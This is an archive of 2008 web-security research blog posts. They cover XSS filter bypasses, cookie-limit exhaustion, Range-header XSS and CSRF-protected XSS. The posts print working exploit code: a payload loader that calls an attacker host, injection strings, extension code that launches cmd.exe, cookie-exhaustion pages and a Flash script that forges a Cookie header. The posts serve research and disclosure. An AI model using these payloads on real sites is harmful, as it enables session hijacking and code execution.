While participating in the CSAW CTF the weekend before last with s0ban, sirdarckcat and maluc (which we won, by the way, with 16375 points; RPISEC, who placed second, had 13575 points, go us ;), I had an interesting thought. One of our attacks was a persistent XSS attack that loaded its payload from off-site so that we could gain some level of persistent control; however, I realised that this attack would fail completely in the face of NoScript, even if our XSS succeeded, since the victim would not have our malicious domain whitelisted.
So, in light of that, I was thinking about how we could load our payload from off-site without the remote site running JavaScript. Of course, I am assuming you have already bypassed NoScript's XSS filters (e.g. because the attack was persistent), but this is particularly useful for persistent attacks where you may want to change the payload later.
After thinking about this for a while, I realised that we already solved this problem back in 2006, when we were talking about using TinyURL for data storage: http://kuza55.blogspot.com/2006/12/using-tinyurl-for-storage-includes-poc.html.
Of course, TinyURL itself is of no use to us here, since we want to be able to change our payload. All the technique really needs to become useful is the URL changed to point to a domain you control (and possibly some kind of synchronisation, so that payloads execute in the order we want rather than the order we get data back from our evil web server).
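As a sketch of the kind of construct this enables (all names here are hypothetical): the attacker's server redirects a same-site frame back to a same-site URL carrying the current payload in the URL fragment, so no script from the attacker's domain ever needs to run; the XSS then reads the payload out of location.hash. The decoding step would look something like:

```javascript
// Hypothetical sketch: evil.example 302s the frame back to a victim-site URL
// with the current payload in the fragment; the persistent XSS decodes it.
function payloadFromUrl(finalUrl) {
  const hash = new URL(finalUrl).hash;      // fragment, including the '#'
  return decodeURIComponent(hash.slice(1)); // the payload the XSS will run
}

// e.g. evil.example/payload might redirect to:
const landed = "http://victim.example/page#alert(document.cookie)";
console.log(payloadFromUrl(landed)); // → "alert(document.cookie)"
```

Since the payload lives on the attacker's server, it can be changed at any time without touching the injected markup.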
Nothing really ground-breaking, but something interesting nonetheless.
Wednesday, September 24, 2008
Thursday, September 04, 2008
IE8 XSS Filter
IE8 came out recently, and a bunch of people have already commented on the limitations of the XSS Filter.
But there are a few more issues that need to be looked at. First of all, if you haven't already done so, I recommend reading this post by David Ross on the architecture/implementation of the XSS Filter.
After talking to Cesar Cerrudo, it became clear that we had both reached the same conclusion: the easiest way to get a generic bypass of the filter is to attack the same-site check. If we can somehow get the user to navigate from a page on the site we want to attack to our XSS, we've bypassed the filter.
If the site is a forum or a blog, this becomes trivial, as we're allowed to post links; but even if we cannot normally post links it is still trivial, because we can inject links via our XSS, since the XSS Filter doesn't stop HTML injection. In any case, read this for more details.
However, this is not the only way to force a client-side navigation. One particular issue (normally not considered much of a vulnerability, unless it allows XSS) is an application letting users control the contents of a frame; this is often seen in the help sections of web apps. Navigation caused by an iframe seems to be considered somehow user-initiated (or something), so the same-site check is applied, and if we point such a frame at an XSS exploit on the same site, the exploit will trigger.
Initially I had thought this would extend to JavaScript based redirects of the form:
document.location = "http://www.site.com/user_input";
or in the form of frame-breaking code, but this does not seem to be the case. IE attempts to determine whether a redirect was user-initiated; if it decides it was not, it does not apply the same-site check and simply runs the XSS Filter. As with the popup blocker before it, though, it has some difficulty getting this right 100% of the time; e.g. this counts as a user-initiated navigation:
<a name="x" id="x" href="http://localhost/xss.php?xss=<script>alert(7)</script>">test</a>
<script>
document.links[0].click();
</script>
However, this is probably a very unrealistic issue, as we need the vulnerable site to actually let the attacker create such a construct.
Furthermore, HTTP Location redirects and meta refreshes are not considered user navigation either, so filtering is always applied to them; open redirects are therefore pretty irrelevant to the XSS Filter.
However, Flash-based redirects do not seem to be considered redirects at all (unsurprising, given that IE has no visibility into Flash files), so any Flash-based redirect can be used to bypass the XSS filter. Though if the redirect requires a user to click, it is probably easier to just inject a link (as described in Cesar's post).
And that's about all I could think of wrt that check :S
However, if you go read Cesar's post you'll see we now do have a method to generically bypass the IE8 XSS Filter, and it only requires an additional click from the user, anywhere on the page.
In a completely different direction: when I first read the posts saying the XSS filter was going to prevent injections into quoted JavaScript strings, my first thought was "yeah, right, let's see them try", since I assumed they would attempt to prevent an attacker breaking out of the string; instead, the filter has signatures to stop the actual payload. Essentially, the filter attempts to stop you from calling a JavaScript function and from assigning data to sensitive attributes, so all of the following injections are filtered:
"+eval(name)+"
");eval(name+"
";location=name;//
";a.b=c;//
";a[b]=c;//
among a variety of other sensitive attributes; however, this does still leave us some limited scope for an attack in reasonably complicated JavaScript.
We are still left with the ability to:
- Reference sensitive variables, which is especially useful when injecting into redirects, e.g.
"+document.cookie+"
- Conduct variable assignments to sensitive data, e.g.
";user_input=document.cookie;//
or
";user_input=sensitive_app_specific_var;//
- Make function assignments, e.g. (note, though, that you can't seem to assign to some functions; e.g. alert=eval doesn't seem to work)
";escape=eval;//
Also, like the meta-tag stripping attack described by the 80sec guys (awesome work btw, go 80sec!), we can strip other pieces of data which look like XSS attacks, such as frame-breaking code, redirects, etc. Note that we can't strip single lines of JS, since a JS block needs to be syntactically valid before any of it executes; so anything potentially active which acts as a security measure beyond the extent of its own tag can be stripped.
It's also worth noting that the XSS Filter doesn't strip all styles; it only strips those that would allow more styles to slip past it, and styles which can execute active code (which is pretty much just expression()).
And that's all from me at the moment. If anyone's looking for an interesting area for research, see whether the IE8 XSS Filter always plays nice with server-side XSS filters; who knows, maybe by getting the filter to strip stuff and break the context, you can get your own HTML rendered in a context the server-side filter didn't expect.
P.S. Take this all with a grain of salt: it has been derived through black-box testing, so the conclusions above are really just educated guesses.
P.P.S. Good on David Ross and Microsoft for making a positive move forward that's going to be opt-out. Obviously everyone is going to keep attacking it and finding weaknesses, but even if this only stops the scenario where the injection is right in the body of the page, it's a huge step forward for webappsec; and if it effectively blocks injections into JavaScript strings, then ASP.NET apps just got a whole lot more secure.
Though I still think the HTML-injection issue needs to be fixed, because even if it's an additional step, users are going to click around and we're just going to see attackers start utilising HTML injection instead.
P.P.P.S. Don't forget this is based on security zones, so it can be disabled, and it is opt-in by default for the intranet zone; so all those local-zone XSSes for web servers on localhost, and XSSes in intranet apps, are going to be largely unaffected.
Labels:
IE,
Security (All),
Web App Sec,
XSS
Wednesday, August 06, 2008
Thoughts on the DNS patch/bug
Is it just me, or does the DNS patch only seem to buy us more time?
At most this decreases the chance of a successful attack 65k-fold; at worst it doesn't help at all because of NAT; and if you're running a default MS OS up to Win2k3, it's a 2.5k-fold decrease.
Honestly, I haven't had time to play around with any of the exploits floating around, but given that one attempt costs at most 2 packets (probably much closer to 1, since you can try lots of responses per packet), we can send 32k packets pretty quickly, and the figures here also seem to say it works pretty damn quickly.
I'm not going to do any figures, but given how network speeds seem to go constantly upwards (or do we want to speculate about an upper cap?), we're going to reach a point where sending 65k times the amount of data is going to be bloody fast again, and this will be an issue all over again.
And if that ever happens, what's left to randomize in the query? Nothing, as far as I can tell. So is the hope that by then we'll have all switched to DNSSEC, or are we planning on altering the DNS protocol at that point?
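To put rough numbers on that (a back-of-the-envelope sketch; the port counts are assumptions based on the figures above, not measurements):

```javascript
// Size of the space an off-path attacker must guess to spoof a response.
const txids = 65536;           // 16-bit DNS transaction ID
const portsRandomized = 64000; // assumed ephemeral-port pool with full randomization
const portsWin2k3 = 2500;      // assumed default pool on MS <= Win2k3, per above

// expected spoofed responses for a ~50% chance of a hit
const expectedGuesses = combos => combos / 2;

console.log(expectedGuesses(txids));                   // 32768: txid alone
console.log(expectedGuesses(txids * portsWin2k3));     // 81920000
console.log(expectedGuesses(txids * portsRandomized)); // 2097152000
```

So the patch moves the work from tens of thousands of packets into the billions, which is exactly the "buys us time" argument: a constant factor, not a structural fix.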
Anyway, going in a completely different direction, I want to take issue with the idea, which seems to pervade a lot of descriptions of the DNS bug, that poisoning random subdomains isn't an issue.
For your typical attack, yes, poisoning random subdomains is kind of useless; however, a lot of the web is held together by the idea that absolutely everything in the DNS tree of a domain is controlled by that domain and is to some extent trustworthy (think cookies and document.domain in JavaScript).
Also, it seems odd that, given that the ability to poison random subdomains seems to be common knowledge to some people, Dan is nominated for another Pwnie award for XSS-ing arbitrary nonexistent subdomains. Sure, that bug lets you phish people more easily, but to me the biggest part of it was that you could easily attack the parent domains from there.
Anyway, the patch, while it has its limitations, seems to buy us some time with both these bugs, and in fact should buy us time with any bug where responses are forged, so that's always a good thing.
Sunday, August 03, 2008
Is framework-level SQL query caching dangerous?
I was in a bookshop a few months ago and picked up a book about Ruby on Rails, and though I sadly didn't buy it (having already bought more books than I wanted to carry) and have forgotten its name, there was an interesting gem in there that stuck in my head.
Ruby on Rails' main method of performing SQL queries (ActiveRecord) has, since 2.0, cached the results of SELECT queries by default (though it does string-level matching of queries, so they need to be textually identical rather than just functionally identical) until a relevant update query updates the table.
I haven't had a chance to delve into the source to see how granularly the cache is invalidated (i.e. if a row in the cache was not touched by an update, is the cache still invalidated because the table was updated?), but in any case it still seems dangerous.
Caching data that close to the application means that unless you know about the caching and either disable it or ensure that anything else that possibly updates the data also uses the same cache, you may end up with an inconsistent cache.
Assuming that flushing the cache is a fairly granular operation (or there is very little activity on the table, or users are stored in separate tables, or something similar), it seems feasible that if any other technology interacts with the same database, it would be possible to ensure that dodgy data stays cached in the Rails app.
A possible example would be a banking site where an SQL query like
SELECT * FROM accounts WHERE acct_id = ?
is executed when you view the account details or attempt to transfer money. If there were another interface to withdraw money (say an ATM; it doesn't have to be web-based) that bypassed Rails' SQL cache, it is theoretically possible that we could withdraw the money while the Rails app still thought we had money left.
At this point, of course, things become very implementation-specific, though there are two main ways I could see this going (maybe there are more):
1. We could be lucky and the application itself subtracts the amount we're trying to transfer and then puts that value directly into an SQL query, so it's as if we never withdrew any money.
2. We could be unlucky and an SQL query of this variety is used:
UPDATE accounts SET balance = balance - ? WHERE acct_id = ?
In which case the only thing we gain is the ability to overdraw an account we would not usually be able to overdraw; not particularly useful unless you've already stolen someone else's account and want to get the most out of it, but it does still let us bypass a security check.
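To make the failure mode concrete, here's a toy model of a string-keyed query cache that only in-framework writes flush. All names are illustrative; this is a sketch of the staleness argument, not ActiveRecord's actual implementation:

```javascript
// Toy query cache: the SQL text is the key, and only writes that go through
// the framework invalidate it, mirroring the scenario described above.
class QueryCache {
  constructor(db) { this.db = db; this.cache = new Map(); }
  select(sql) { // string-level matching, as the post notes Rails does
    if (!this.cache.has(sql)) this.cache.set(sql, this.db.query(sql));
    return this.cache.get(sql);
  }
  update(sql) { this.db.execute(sql); this.cache.clear(); }
}

// A fake database holding one account balance.
const db = {
  balance: 100,
  query() { return this.balance; },
  execute() { this.balance -= 50; },
};

const rails = new QueryCache(db);
rails.select("SELECT balance FROM accounts WHERE acct_id = 1"); // 100, now cached
db.balance -= 80; // an external writer (an ATM, say) bypasses the cache entirely
const seenByRails = rails.select("SELECT balance FROM accounts WHERE acct_id = 1");
console.log(seenByRails, db.balance); // prints: 100 20 (Rails still sees the old balance)
```

Any transfer check the app performs against the cached value is now being made against money that no longer exists.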
Does anyone have any thoughts on this? Is this too unlikely? Is no-one ever going to use Rails for anything sensitive? Should I go and read the source next time before posting crap? etc
Or knowledge of the Rails caching mechanism? I'll probably take a look soon, but given I've been meaning to do this for months...
Sunday, July 27, 2008
XSS-ing Firefox Extensions
[EDIT]:It turns out I fail at testing things on the latest version, see comments for some more details, sorry about that Roee.[/EDIT]
Roee Hay recently posted a blog post on the Watchfire blog about an XSS bug in the Tamper Data extension (it was posted much earlier, but removed quickly; RSS is fun); however, his assessment of the impact was wrong.
The context of the window is still within the extension, and so by executing the following code you can launch an executable:
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath("C:\\WINDOWS\\system32\\cmd.exe");
file.launch();
(Code stolen from http://developer.mozilla.org/en/docs/Code_snippets:Running_applications)
But even then: I had never even heard of the graphing functionality in Tamper Data, and given the need to actually use that functionality on a dodgy page, the chance of anyone getting owned by this seems very small to me.
Labels:
Firefox,
Security (All),
Web App Sec,
XSS
Monday, July 21, 2008
Licensing Content
Now, I am not a lawyer (so I don't know what information can be licensed and what can't), but as far as I know, the fact that I have specified no license for the content on this blog does not mean it is public domain, or similar.
So, I just wanted to make a quick post about what license the content of this blog is provided under.
All the information on this blog is DUAL LICENSED,
1. If you plan to use it for personal or non-profit purposes you can use it under the Creative Commons "Attribution-Noncommercial-Share Alike 3.0" license.
2. If you plan to use it for _any_ other purpose, e.g.:
a. use the information in any commercial context
b. implement this information in your non-GPL application
c. use this information during a Penetration Test
d. make any profit from it
you need to contact me in order to obtain a commercial license.
Seems only fair to me :)
P.S. Since realistically the chance of me finding a violation is slim-to-none, and the chance of me actually doing anything about it (e.g. going to court, etc), is even smaller, this is more a statement of my will for the information than anything else.
Saturday, July 12, 2008
Some Random Safari Notes
I got to take a quick look at some Safari stuff at work a few days ago, and came away with a few notes that I thought might interest people about Safari:
Cross-site cooking works the same way as it does in Firefox 2.0: it works just as the RFC describes, and we can set cookies for .co.uk, .com.au, etc.
HttpOnly is not supported.
Safari parses Set-Cookie headers as the RFC says, which means cookies are comma-separated (no other browser seems to do this). So in ASP.NET and JSP, when you use the framework's method of setting cookies and let the user control the value, they can inject arbitrary cookies by specifying something like ", arbitrary_name=arbitrary_value" as the cookie value.
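An illustrative comma-splitting parser (not Safari's actual code) shows why a user-controlled value turns into a second cookie:

```javascript
// Minimal sketch of RFC-style Set-Cookie parsing that splits on commas,
// as the post says Safari does. Names and header values are made up.
function parseSetCookie(header) {
  return header.split(",").map(part => {
    const [pair] = part.trim().split(";"); // drop attributes like path=/
    const eq = pair.indexOf("=");
    return { name: pair.slice(0, eq).trim(), value: pair.slice(eq + 1) };
  });
}

// The framework emits one header, but the user controlled the value:
const userValue = "x, arbitrary_name=arbitrary_value";
const cookies = parseSetCookie(`pref=${userValue}`);
console.log(cookies.length); // → 2: pref=x plus the injected cookie
```

Browsers that treat the whole header as a single cookie are unaffected; the splitting behaviour is what makes the injection work.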
Referers are not leaked from HTTPS to HTTP, but are leaked from one HTTPS site to another HTTPS site.
The Safari cache (at least on Windows) is an SQLite database where all the data is double hex-encoded; it looks something like X'aabbccddeeff, etc., and when you strip the first two chars and decode it you get another blob which looks identical to the first, which you then decode the same way to get an XML document with the data. I wrote this dodgy PHP function to do the conversion for me (you need to call it twice on the blob you extract from the database):
function decode_blob ($blob) {
    $ret = "";
    // skip the leading X' marker, then turn each hex pair back into a byte
    for ($i = 2, $c = strlen($blob); $i + 1 < $c; $i += 2) {
        $ret .= chr(hexdec($blob[$i] . $blob[$i + 1]));
    }
    return $ret;
}
On the iPhone (emulator at least; I didn't get to use an actual iPhone), the last character of the password field is shown until you type the next one (or the field loses focus); this makes sense since it's hard to type on iPhones, but it's still curious.
Safari on the iPhone (emulator, again) doesn't seem to ever actually close, so unless you close the emulator (I assume this is equivalent to turning off your iPhone, if that's even possible), all session cookies persist.
Hope that helps someone.
Friday, July 04, 2008
Cookie Path Traversal
Not sure if anyone actually cares about this, but I thought I'd throw it out here: I found out a while ago that if a server is running IIS (or something else which accepts Windows-style paths), it is possible to get cookies sent to paths they do not belong to, by using an encoded backslash as a directory delimiter, like this: http://www.microsoft.com/en/us/test/..%5Cdefault.aspx
It works on all the browsers I tested (latest versions of IE, Firefox, Opera & Safari).
Not really useful; maybe on the off chance that, say, you need httpOnly cookies for some reason and you can see headers for part of a path (e.g. because there's a phpinfo page in the root, but the cookie is scoped to /app), or whatever. Supposedly this was considered a security issue by Secunia back when you could use %2e%2e/ on all servers in all browsers: http://secunia.com/advisories/9680/ (though I think the premise of that bug is that you can't jump paths otherwise, which is of course wrong).
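A sketch of why the trick works (the helper names are mine; the path logic is the point): the browser scopes cookies by the literal, still-encoded request path, while IIS decodes %5C into a backslash and normalises it away as a directory separator:

```javascript
// Browser's view: no decoding, forward slashes only; the cookie path is
// everything up to the last '/'.
function browserCookiePath(url) {
  return new URL(url).pathname.replace(/[^/]*$/, "");
}

// Server's (IIS-style) view: decode, treat backslashes as separators,
// then collapse '..' segments.
function iisResolvedPath(url) {
  const p = decodeURIComponent(new URL(url).pathname).replace(/\\/g, "/");
  const parts = [];
  for (const seg of p.split("/")) {
    if (seg === "..") parts.pop();
    else if (seg && seg !== ".") parts.push(seg);
  }
  return "/" + parts.join("/");
}

const u = "http://www.microsoft.com/en/us/test/..%5Cdefault.aspx";
console.log(browserCookiePath(u)); // → "/en/us/test/" (cookies for this path get sent)
console.log(iisResolvedPath(u));   // → "/en/us/default.aspx" (the page actually served)
```

So cookies scoped to /en/us/test/ ride along with a request that the server answers as /en/us/default.aspx.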
Sunday, June 08, 2008
Web Browsers and Other Mistakes
If anyone's interested, I uploaded my Bluehat slides here: http://www.slideshare.net/kuza55/web-browsers-and-other-mistakes-presentation/ (view online) and here: http://www.slideshare.net/kuza55/web-browsers-and-other-mistakes-presentation/download (download ppt)
Hopefully you get something out of them.
Saturday, April 12, 2008
How much do you trust your DNS operator?
TechCrunch recently broke a story about Network Solutions hijacking users' unused subdomains for advertising. It seems to have only applied to people using Network Solutions for their shared hosting, and seems to have been removed now. (None of the IPs I tested on the same machine returned advertising for their non-existent subdomains) And on top of that we know that anyone who is on shared hosting is pretty easy pickings anyway, so this would seem to be a non-issue regarding security.
But Network Solutions doesn't exactly have the cleanest record in terms of ethics, and there isn't anything technically stopping Network Solutions or any other company operating NS servers for your domain from doing the same thing even if they're not hosting your content.
So given that this is a security blog, and definitely not an ethics blog, why am I talking about this? Because it introduces security problems.
As I talked about in previous posts about cookies, they are almost always sent to subdomains, and if your DNS operator implements something like this then all your users' cookies are being sent to your DNS operator's servers, which means that your cookies are taking two specific network paths which both have to be secure for your credentials to remain safe (three if you count that the DNS request has to be safe).
Now, you may trust that your DNS provider isn't going to do anything intentionally malicious with the cookies, and you could make the valid point that worrying about attackers who have already owned other networks is a vague and impractical threat to defend most websites against, but there is a much simpler risk involved here.
Network Solutions has made no effort to secure these pages from XSS, and why would they? They're essentially brochureware domains. Anyone who has probed a parked domain for XSS has probably seen that they have plenty of XSS holes, and the pages Network Solutions served for non-existent subdomains were the same pages that they serve on parked domains.
So after googling to find a parked Network Solutions domain, I found it was unsurprisingly trivial to XSS it via the search field.
So; how much do you trust your DNS operator?
Saturday, February 23, 2008
HTTP Range & Request-Range Request Headers
For those that haven't heard of the Range header, here's a link: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.35.2
For everyone who can't be bothered reading a link: essentially, the Range header is what you use to ask a server for a part of a response, rather than the whole response; it's what makes resumable downloads possible over HTTP.
Anyway, another piece of research I presented at 24c3 is pretty simple, but rather useful:
Flash
If Flash were to allow us to send a Range header, then we would be able to get things sent to us completely out of context.
Until Apache 2.0 this header was only used when requesting static files, so it would not influence a typical XSS, however if we have an application such as vBulletin which protects against FindMimeFromData XSS attacks by searching the first 256 bytes for certain strings, then we can simply place our strings after the first 256 bytes and get Flash to send a header which looks like this:
Range: bytes=257-2048
To have unscanned data sent in the first 256 bytes, leading to XSS.
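A toy model of that bypass (the scanner and server here are stand-ins I wrote, not vBulletin or Apache code): the defender only inspects the first 256 bytes of the full document, but the Range slice the client actually receives starts at our payload:

```javascript
// Defender: search the first 256 bytes for dangerous strings.
function scanFirst256(body) {
  return body.slice(0, 256).includes('<script');
}

// Range-aware server: return only bytes start..end of the body.
function serveRange(body, start, end) {
  return body.slice(start, end + 1);
}

const body = 'A'.repeat(300) + '<script>alert(1)</script>';

console.log(scanFirst256(body));             // false: payload sits past byte 256
const partial = serveRange(body, 300, 2048); // Range: bytes=300-2048
console.log(partial.startsWith('<script>')); // true: payload now leads the response
```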
However, since Apache 2.0 (and possibly in other webservers, but they're irrelevant to this post), the Range handling code is implemented as a filter; this means it is applied to the output of every request, even dynamic ones.
This means that if we have a normally unexploitable XSS condition where our user input is printed to the page inside an attribute with quotes either encoded or stripped, but all other metacharacters left intact, or where an XSS filter did not encode the HTML attributes at all, like so:
<a href="http://site.com/<script>alert(1)</script>">link</a>
Then we could use the Range header to request only our unencoded portion which would result in XSS.
Now, why is this important, given that Flash has never let anyone send a Range header?
Well, while looking through the Apache source code I found this beautiful snippet:
if (!(range = apr_table_get(r->headers_in, "Range"))) {
    range = apr_table_get(r->headers_in, "Request-Range");
}
This essentially says: if you can't find a Range header, look for a Request-Range header. And until the latest version of Flash (9,0,115,0), the Request-Range header was not blocked. (I had hoped this would be unpatched when I presented it, but you can't really hope for much when you sit on a bug for almost half a year...)
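Restated as a sketch in JavaScript (a toy of mine, not the real module code): Request-Range is consulted only when Range is absent, which is why an unblocked Request-Range header was just as good as Range itself:

```javascript
// Toy re-statement of the Apache fallback logic quoted above.
function effectiveRange(headers) {
  return headers['range'] || headers['request-range'] || null;
}

console.log(effectiveRange({ 'request-range': 'bytes=257-2048' }));
// bytes=257-2048 — the fallback is honoured
console.log(effectiveRange({ range: 'bytes=0-99', 'request-range': 'bytes=257-2048' }));
// bytes=0-99 — a real Range header wins
```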
Firefox
Now the part I didn't present. Firefox 3 implemented the new Cross-Site XMLHttpRequest which, as the name suggests, lets you make cross-site requests and read the responses.
There is some documentation here: http://developer.mozilla.org/en/docs/Cross-Site_XMLHttpRequest
The part of those specs which is relevant to this post is that you can allow Cross-Site XMLHttpRequests by including an XML preprocessing instruction; however you can't just XSS it onto the page as usual because it needs to be before any other data.
However, the XMLHttpRequest object allows you to append both Range and Request-Range headers. And by appending a Range header we can get our XSS-ed instruction to the start of the response, and read the response.
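To see why the Range header matters here, consider a string-level sketch (my own, with a made-up page): the injected processing instruction sits mid-document, where the parser ignores it, but slicing the response from its byte offset makes it the very first thing received:

```javascript
// Hypothetical page with our injected processing instruction mid-document.
const page =
  '<html>secret data <?access-control allow="*.evil.com"?> more secret data</html>';

const start = page.indexOf('<?access-control');
const served = page.slice(start); // what "Range: bytes=<start>-" would return

console.log(page.startsWith('<?'));   // false: the PI is not first, so it is ignored
console.log(served.startsWith('<?')); // true: now the PI leads the response
```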
The limitations with this are fairly strict; as far as I can tell, you cannot add to the XHR policy cache with xml instructions, only with headers, and if you attempt to request multiple ranges, then the multi-part boundary which begins the response will be sent before the xml instruction, and so it will not be parsed; so you can only get the contents of the page that are after your XSS point. On the other hand, I wasn't even able to get non-GET requests to work even with server-side co-operation, so take these with a handful of salt.
On the up side, this does bypass the .NET RequestValidation mechanism, since that does not flag on <?. I doubt this will be very exploitable in many scenarios, though given the number of .NET apps which are only protected by the RequestValidation mechanism, you're sure to find something.
Friday, February 22, 2008
Racing to downgrade users to cookie-less authentication
Be warned: this post is a bit out there, and not extremely practical, but I'm posting exploit code and I thought the attack was fun.
If you ever disable cookies and try to use the web you will notice that a surprising number of websites that use sessions still work, especially if they are using a session management framework or were written during the browser wars when a significant number of people still didn't have cookie support in their browser, or were suspicious enough to have them disabled.
All of the cookie-less authentication systems rely on the same idea: passing session tokens through the URL. Other than being bad practice because it gets logged, etc, FUD, etc, they also get leaked through referers to 3rd parties. So if we can get a persistent image pointing to our server, then we will have the session tokens leaked to us. And it does have to be persistent, because unlike cookies, session tokens passed in the URL are not implicit and are not attached to our reflected html injections.
However this is usually never raised as an issue because everyone has cookies enabled these days, and this attack doesn't work against anyone.
However, how do web applications which need to work without JavaScript detect if a user's browser supports cookies? They simply set a cookie, and then when the user logs in they verify whether a cookie was sent; if it was not, they start putting the session id in all the links and forms on a page. Some applications also check on every subsequent page if they can set a cookie, and if they can there is no way to degrade to cookie-less auth again.
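The detection logic described above can be modelled in a few lines (the names are mine, not from any particular framework); the race below is about making sure the probe cookie is missing at the moment this check runs:

```javascript
// Server-side check at login time: did the probe cookie set earlier come back?
function chooseAuthMode(requestCookies) {
  return 'probe' in requestCookies ? 'cookie' : 'url';
}

console.log(chooseAuthMode({ probe: '1' })); // cookie
console.log(chooseAuthMode({}));             // url  (what the attack forces)
```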
As I wrote previously; I discovered that in Firefox and Opera we can exhaust the cookie limit to delete the user's old cookies.
If we assume that we will have the user browsing both a site which degrades to cookie-less auth and our malicious site at the same time, then you can see that there is a race condition between when the server sets the cookie and the user logs in (and in some applications, between when a page is served and the next request is made).
The question is; can we win this race?
In Firefox, it takes approximately 100 milliseconds on my machine to set 1000 cookies over 20 hostnames, with 1 hostname per iframe. So we can win any race.
In my testing Opera is much faster at navigating between pages and setting cookies, however I'm still unsure if we can win this race in Opera.
I think the code at the end of this post can be improved by having the iframes on hostnames which look like a.b.c.d....z.123.ccTLD, are 256 characters long, and are made up of 126 levels, where the first 125 levels are single-character portions, so as to maximise the number of levels in the hostname.
And then in each iframe we would set the max number of cookies for .a.b.c.d....z.123.ccTLD, then .b.c.d....z.123.ccTLD, and then .c.d....z.123.ccTLD, etc, until we set a cookie for 123.ccTLD - this would mean we do not have to navigate between pages at all, and we could do Opera's 65536 max cookie limit in 18 iframes; however before doing this we might have to force a lookup to all 2815 hostnames so that we don't hit a bottleneck in Opera's cross-site cooking code.
However, if we cannot get things as fast as in Firefox, we may still be able to win some races.
A lot depends on the application, but the easiest case is where we only have to win one race, and we can keep racing, such as the Phorum software which runs sla.ckers.org; it sets a temporary cookie whose existence it checks when you log in, and if it is not there when you log in, it uses cookie-less auth for the whole session.
So our race here is against how long it takes the user to fill in the login page; and considering that if we lose the race we end up deleting all the cookies, we simply race again and again.
vBulletin on the other hand, is a much tougher beast. It tries to set a cookie on every page, even when you have begun using cookie-less auth, and also has a redirect page which redirects you in 2 seconds.
So not only do we have to win every race until a user views our image, we also have to be able to beat a two second race.
We can probably stop the redirect happening by simply running our code (which lags the system a bit), and winning the race like that, but winning the race 100% of the time may still be difficult, and would lag the system enough for the user to think of closing the tab/window.
However, when we race we race against everything, so the code we use is identical between applications, and would only have to change between browsers.
Anyway, here's some code for Firefox which spins when it doesn't need to be racing, i.e. when it has completely saturated the cookie jar and writing any additional cookie would simply overwrite earlier cookies that our script set, so that it only lags the system in bursts.
You need to have 20 subdomains set up which point to the second file; the easiest way to do this is just wildcard DNS. And have the first file set up on the parent domain, e.g. [1-20].localhost & localhost
main.php:
<html>
<body>
<script>
document.domain = document.domain;

var numloaded = 0;
var tries = 0;

function loaded() {
    if (++numloaded == 20) {
        go();
    }
}

var numnotified = 0;

function notify() {
    if (++numnotified == 20) {
        numnotified = 0;
        window.setTimeout('poll()', 300);
    }
}

var time = new Date();

function go() {
    numnotified = 0;
    document.cookie = 'testing=1';
    for (var n = 0; n < 20; n++) {
        window.frames[n].go();
    }
}

function poll() {
    var missing = 0;
    for (var n = 0; n < 20; n++) {
        missing = missing + window.frames[n].poll();
    }
    if (missing > 0) {
        go();
    } else {
        window.setTimeout('poll()', 300);
    }
}
</script>
<?php
for ($i = 0; $i < 20; $i++) {
    print '<iframe src="http://'.($i+1).'.localhost/cookie_sub.php" style="visibility: hidden" width="1" height="1"></iframe>';
}
?>
</body>
</html>
cookie_sub.php:
<?php
header("Expires: Fri, 17 Dec 2010 10:00:00 GMT"); // To speed up repeated attacks
?>
<html>
<body>
<script>
document.domain = 'localhost';
window.parent.loaded();

function go() {
    for (var n = 0; n < 50; n++) {
        document.cookie = n + "=1";
    }
    window.parent.notify();
}

function poll() {
    if (document.cookie.split('; ').length == 50) {
        return 0;
    } else {
        return 1;
    }
}
</script>
</body>
</html>
Exploiting CSRF Protected XSS
XSS vulnerabilities which are protected by CSRF protections are usually considered unexploitable, due to the fact that we have no way of predicting the CSRF token.
However, these protections do nothing more than check that the user is first "logged in" and that the CSRF token they sent is tied to their session; nowhere in this chain of events is there a condition which states that an attacker must be forcing the victim to use their own session identifier (cookie).
If we are able to force the victim to send a request which contains the attacker's cookie, CSRF token and XSS payload, then we will pass the CSRF protection checks and have script execution.
A General Case
So how would we go about this? As I mentioned in my "Exploiting Logged Out XSS Vulnerabilities" post, Flash (until 9,0,115,0, and not in IE) allows us to spoof the Cookie header for a single request; however, this suffers from the same problem that we cannot completely overwrite cookies, only add an additional Cookie header.
This is indeed a possible attack vector though; if we first make sure the user is "logged out" (and also has no value for the login cookie) either by simply waiting, using a CSRF attack to log the user out (and hoping the website also clears its cookies), or exhausting the browser's cookie limit, we can then add our own Cookie, CSRF token and XSS payload to the request using similar Flash code, e.g.
class Attack {
    static function main(mc) {
        var req:LoadVars = new LoadVars();
        req.addRequestHeader("Cookie", "PHPSESSID=our_valid_session_id");
        req.x = "y";
        req.send("http://site.com/page.php?csrf_token=our_csrf_token&variable=",
                 "_self", "POST");
        // Note: The method must be POST, and must contain
        // POST data, otherwise headers don't get attached
    }
}
Then the application will receive a request with our (the attacker's) session id, a valid CSRF token and our XSS payload from the victim's browser.
Of course, the problem with this is that the user really is logged out (which we forced, due to our inability to simply overwrite the cookie or stop it being sent) and the browser no longer has the victim's cookies, so the only attacks available from this point are the other attacks mentioned in my "Exploiting Logged Out XSS Vulnerabilities" post. While this is not ideal, it does at least give us something other than an unexploitable XSS.
Cookie tricks
Again, with this technique we can also set a cookie for the specific path, either by having an XSS on a related subdomain or by abusing a cross-site cooking bug; the user then still has their original cookie intact, and we can simply remove our own cookie from the user's browser once our XSS has fired.
Abusing RequestRodeo
Another case where the user would be logged out is the case where we can somehow get the cookies stripped from the user's request.
The technique I presented at 24c3 abused one such piece of software: the RequestRodeo Firefox extension, created by Martin Johns and Justus Winter, which does a good job of protecting against a lot of CSRF attacks by stripping cookies from requests originating from 3rd party sites (i.e. a request going to site.com which was induced by evil.com will not have any cookies attached to it). Which is just what we need.
Of course, this is a nice place to note that this is a niche piece of software that doesn't really provide a valid avenue for exploitation in almost any scenario, but as I explained in my post "Understanding Cookie Security", we can also delete all of a user's cookies by exhausting the browser's global limit on the number of cookies it will store.
Anyway, given that RequestRodeo strips all cookies (including the ones we are attempting to send via Flash), we still face the problem that we need to be sending a valid session identifier to which our valid CSRF token is tied. We do not face this problem when we remove the user's cookies, where we can use the Flash approach outlined above, but we can also use the following approach, which has the added benefit of still working on everyone (not just those who are unpatched).
Anyway, one interesting feature of PHP and other frameworks is that they accept session identifiers through the URL. This has of course led to easily exploitable Session Fixation attacks; however in PHP at least, if a cookie is being sent, then the value in the URL is completely ignored.
